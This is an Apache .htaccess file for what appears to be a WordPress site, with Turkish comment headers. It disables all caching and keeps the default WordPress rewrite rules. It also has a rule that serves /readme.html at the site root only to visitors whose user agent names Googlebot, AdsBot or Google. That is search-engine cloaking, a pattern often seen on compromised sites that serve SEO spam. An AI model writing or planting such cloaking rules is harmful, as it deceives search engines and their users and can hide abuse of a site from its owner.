# ===================================== # CACHE TAMAMEN KAPAT # ===================================== Header always set Cache-Control "no-store, no-cache, must-revalidate, max-age=0" Header always set Pragma "no-cache" Header always set Expires "0" ExpiresActive Off # ===================================== # REWRITE ENGINE # ===================================== RewriteEngine On RewriteBase / # ===================================== # GOOGLE BOT → readme.html # ===================================== RewriteCond %{HTTP_USER_AGENT} (googlebot|adsbot|google) [NC] RewriteCond %{REQUEST_URI} ^/?$ RewriteRule ^$ /readme.html [L] # ===================================== # WORDPRESS DEFAULT # ===================================== RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L]